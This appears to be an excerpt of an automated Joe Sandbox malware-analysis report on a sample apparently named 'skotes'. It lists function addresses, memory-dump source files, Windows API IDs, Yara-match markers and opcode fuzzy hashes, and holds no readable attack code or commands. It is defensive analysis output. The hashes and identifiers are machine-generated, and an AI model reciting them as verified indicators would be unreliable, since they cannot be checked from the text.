                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: b8f61435665b495ef5d2b0f4fc4854372e503787059a9abd5de505c8a22e422d
                                                        • Instruction ID: 31f16ac375df4168696dfac78be7473395754863483d6b962402c08e5932dd9b
                                                        • Opcode Fuzzy Hash: b8f61435665b495ef5d2b0f4fc4854372e503787059a9abd5de505c8a22e422d
                                                        • Instruction Fuzzy Hash: 62E0ED312416E69AEB3132778C00B5BA648CB433B0F290222EC68A60A0DB20FC0081F1
                                                        Function 00DC6C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 43d01393dd8bcbe812c3b5b021bf4a3d9d93793451250cb2e063bc65170f12f4
                                                        • Instruction ID: cc39a484694ee60d5908ce95a1cde9feea3ced600c5b9d284c6ae54f5fd42fec
                                                        • Opcode Fuzzy Hash: 43d01393dd8bcbe812c3b5b021bf4a3d9d93793451250cb2e063bc65170f12f4
                                                        • Instruction Fuzzy Hash: 3AF0D171A00604ABCB01BB699D03B5E7B75EB06760F80474CE826772D1EA305A1447F2
                                                        Function 051A0DB1 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c90b82d64a7a08c613611eb2c31840b1df595b4145ae3297327ea9b29ee74dfb
                                                        • Instruction ID: daeb07316ffab48b2ff28da647111a2f7759d6eb2ec145b78357d09888a00be9
                                                        • Opcode Fuzzy Hash: c90b82d64a7a08c613611eb2c31840b1df595b4145ae3297327ea9b29ee74dfb
                                                        • Instruction Fuzzy Hash: 7D11ACEF14C150BD616BC1512B18AF36B6FE2CB730332882AF447CA607D3845E892131
                                                        Function 051A0D78 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c76ee34f8ba2b43f426e84dfcbcd392787a51bac827f0e3bdaa89b15de5ad4e
                                                        • Instruction ID: d9e7e1ee94ff848f75c7d05635ee65d897219d192913ec45a3d03135d706713e
                                                        • Opcode Fuzzy Hash: 1c76ee34f8ba2b43f426e84dfcbcd392787a51bac827f0e3bdaa89b15de5ad4e
                                                        • Instruction Fuzzy Hash: D1015EEF14C150BE716BC1452B18AF7666FE6CB731332882AF407C6603D7941E8C2031
                                                        Function 051A0D7E Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4070b073ea997263b8d5b6e6813ab3168456941006f251fbe625c4e3b4feb268
                                                        • Instruction ID: 30bbf7bcc6ab1997d08d70779aad107209ce629ecd6f43f054bcd82663f0fad3
                                                        • Opcode Fuzzy Hash: 4070b073ea997263b8d5b6e6813ab3168456941006f251fbe625c4e3b4feb268
                                                        • Instruction Fuzzy Hash: 31015EEF14C110BE6167C5452B18AF7666FE6DB731332882AF407C6607D7945E892132
                                                        Function 051A0DD0 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3d53c1f24306f4deab52941d8629acc9e29e8b1d1c25925a543176ed336ba911
                                                        • Instruction ID: b0eea84faa1cc4311206345c094c14788fdb26986b5e147506ead96e1de176ec
                                                        • Opcode Fuzzy Hash: 3d53c1f24306f4deab52941d8629acc9e29e8b1d1c25925a543176ed336ba911
                                                        • Instruction Fuzzy Hash: C10146EF24C110BD7167C5812B18AF767AFE5DA631332886AF906C9607D39A0A8D6132
                                                        Function 051A0DE6 Relevance: .1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e453270e202e0e6ee029cf7c7fb33977608fee160fe552ea140809f19959fb2
                                                        • Instruction ID: 142e7d96796f140aca9c26a0041d5c83474fbbf56473f2ce0121449e72976cc6
                                                        • Opcode Fuzzy Hash: 9e453270e202e0e6ee029cf7c7fb33977608fee160fe552ea140809f19959fb2
                                                        • Instruction Fuzzy Hash: 7CF014EF24C2107DB256C1512B28AFBA76FE1DAA31336886AF847C5503E3890A8D3131
                                                        Function 051A0E1B Relevance: .0, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11158b4dcef1f77d202b034b822fd40d0bd349fadefb9c6918450519bb55e81c
                                                        • Instruction ID: 83f3b787bd1e05e831c54b67332428d3e1a4fe42a9229aacfd9221b1beed56fd
                                                        • Opcode Fuzzy Hash: 11158b4dcef1f77d202b034b822fd40d0bd349fadefb9c6918450519bb55e81c
                                                        • Instruction Fuzzy Hash: EFE0C9AF24C1106D7166C0523B28EF7536ED1D97313328827F907C5506D3890ACD3172
                                                        Function 051A0E2A Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0974e4354fce85bf6090de61c4cb72a3ccf0c1f147bcd2561b8778e719125f17
                                                        • Instruction ID: 1a688733947d613d30596e9cb59554b4e5e5cde5282a74a8b8d4fa16028fa8ce
                                                        • Opcode Fuzzy Hash: 0974e4354fce85bf6090de61c4cb72a3ccf0c1f147bcd2561b8778e719125f17
                                                        • Instruction Fuzzy Hash: B1E0C2AF10C1106CB156C0423B28EFB536EE1D9731332C827F406C5006D28A4ACE2131
                                                        Function 051A0E51 Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3778070944.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_51a0000_skotes.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe0b261d1c0f9b13a6b9a534f8c43e631ef6912441c3f640f0831c6ae05a2b57
                                                        • Instruction ID: 084227df1afaf3f79d7fbaa052550b73a8d637e51af611b22e91ef127a3aae74
                                                        • Opcode Fuzzy Hash: fe0b261d1c0f9b13a6b9a534f8c43e631ef6912441c3f640f0831c6ae05a2b57
                                                        • Instruction Fuzzy Hash: 79E01AEF10D0506DB112C1127F29EFB976DC3D8B32B71C96BF446C244BC2890A8E6132

                                                        Non-executed Functions

                                                        Function 00DF31A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __floor_pentium4
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 4168288129-2761157908
                                                        • Opcode ID: 633cba6af4dbc778c710c5647a1cfa542a596bc7ee4b4e1a140991bf6ff8bde0
                                                        • Instruction ID: 9e291fcbf7f2510c338bf604f05d6b8e9951f936e463d8590a1cddfcd4dfc749
                                                        • Opcode Fuzzy Hash: 633cba6af4dbc778c710c5647a1cfa542a596bc7ee4b4e1a140991bf6ff8bde0
                                                        • Instruction Fuzzy Hash: EEC23D71E0462C8FDB25CE28DD407EAB3B5EB44354F1A81EAD94DE7240E775AE818F60
                                                        Function 00DF2D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                        • Instruction ID: 1efbb2f0f6268205d3de606585b41fe57b2ffefe728074fe8f1a7c1ed21b22d4
                                                        • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                        • Instruction Fuzzy Hash: 40F11071E012199FDF14CFA9C8806ADB7F1FF48314F2A816AE915AB345D731AE41CBA4
                                                        Function 00DCCBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00DCCF52,?,?,?,?,00DCCF87,?,?,?,?,?,?,00DCC4FD,?,00000001), ref: 00DCCC03
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FilePreciseSystem
                                                        • String ID:
                                                        • API String ID: 1802150274-0
                                                        • Opcode ID: bc71abaf6291d5a12b3b3e9416d233295d56ebd66781408c20e4416ccff5060d
                                                        • Instruction ID: d33c804251c0194d62e983e788691d9b639a85b3d531a2f996070f9fbb78c7ca
                                                        • Opcode Fuzzy Hash: bc71abaf6291d5a12b3b3e9416d233295d56ebd66781408c20e4416ccff5060d
                                                        • Instruction Fuzzy Hash: DCD0223A602138DB8A112B85EC08EACBB689B05B203081016EE0C23120CAA1AC404BE0
                                                        Function 00DE7F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                        • Instruction ID: 243db6d84ac91b979b790cc41572a11062a93c9a8c139f2fb2f7e9cbe7af8ad4
                                                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                        • Instruction Fuzzy Hash: 94517D306487C45ADB78BA6B88957BE679ADF01304F1C051DE48ED72C2CE52DD49A371
                                                        Function 00DB4DE0 Relevance: .7, Instructions: 701COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3196605982919673d66b26636b7afe37d7559e32302b00ee8228850ed211155
                                                        • Instruction ID: c6fec8c463764618d9a9fc321b153c5b912524b799d3ac6bfae20fe1d82044dc
                                                        • Opcode Fuzzy Hash: e3196605982919673d66b26636b7afe37d7559e32302b00ee8228850ed211155
                                                        • Instruction Fuzzy Hash: 082260B3F515144BDB0CCE9DDCA27ECB2E3AFD8218B0E903DA40AE3345EA79D9158644
                                                        Function 00DF7049 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0574942cbc8e0e83d756eb0916c1763153a9c820e6f148a26450c77c0418447
                                                        • Instruction ID: 7de9c66a6c8bd1dc98553ff2dcd156366fbf103bd75ee6c0088f70be4f983e34
                                                        • Opcode Fuzzy Hash: e0574942cbc8e0e83d756eb0916c1763153a9c820e6f148a26450c77c0418447
                                                        • Instruction Fuzzy Hash: E1B14931614609DFD728CF28C486BA57BE1FF45364F2AC658E999CF2A1C335E982CB50
                                                        Function 00DB4B30 Relevance: .2, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c54d4803d953ba1b19fdd852420987e6bf9bb12bcac11504c4c9a6db017b338
                                                        • Instruction ID: 858aab66f7abdbf8821078a0e18b3cd57f0d2fe71e2247bd2b06d39547db2094
                                                        • Opcode Fuzzy Hash: 3c54d4803d953ba1b19fdd852420987e6bf9bb12bcac11504c4c9a6db017b338
                                                        • Instruction Fuzzy Hash: FC81EB70A00245CFDB15CF69D890BEEBBB1FB19300F194669DA52A7353C7319949CBB0
                                                        Function 00DF78BB Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f9445bd8129bb15be29fddbbecb65be0d0f7729ce24a03d28fdbdc3c239c95f
                                                        • Instruction ID: 2265313f6105d707c8998694173601e92a6e551b0d9616f29f13e3a818215478
                                                        • Opcode Fuzzy Hash: 4f9445bd8129bb15be29fddbbecb65be0d0f7729ce24a03d28fdbdc3c239c95f
                                                        • Instruction Fuzzy Hash: EA21B673F204394B770CC47E8C522BDB6E1C78C541745823AE8A6EA2C1D968D917E2E4
                                                        Function 00DF779B Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
